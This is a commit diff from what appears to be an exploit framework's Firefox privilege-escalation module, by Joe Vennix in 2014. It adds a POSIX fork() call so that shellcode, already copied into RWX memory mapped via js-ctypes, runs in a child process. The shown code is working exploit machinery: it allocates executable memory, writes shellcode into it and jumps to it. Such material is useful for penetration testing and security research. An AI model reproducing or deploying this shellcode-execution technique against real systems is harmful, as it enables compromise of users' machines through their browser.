Add posix fork() call before running code.

bug/bundler_fix
Joe Vennix 2014-03-12 02:56:26 -05:00
parent 7afcb6aee8
commit 851fca2107
1 changed files with 7 additions and 1 deletions

View File

@ -52,6 +52,10 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */
);
var fork = lib.declare('fork',
ctypes.default_abi, /* calling convention */
ctypes.int /* return type */
);
var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
var cstr = ctypes.jschar.array()(shellcode);
//var bytes = ctypes.char.array()(shellcode).length-1;
@ -59,7 +63,9 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
/* there is probably a better way to do this */
var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/);
if (!m) throw new Error("Could not find address of buffer.");
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
if (fork() == 0) {
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
}
};
var execWindows = function() {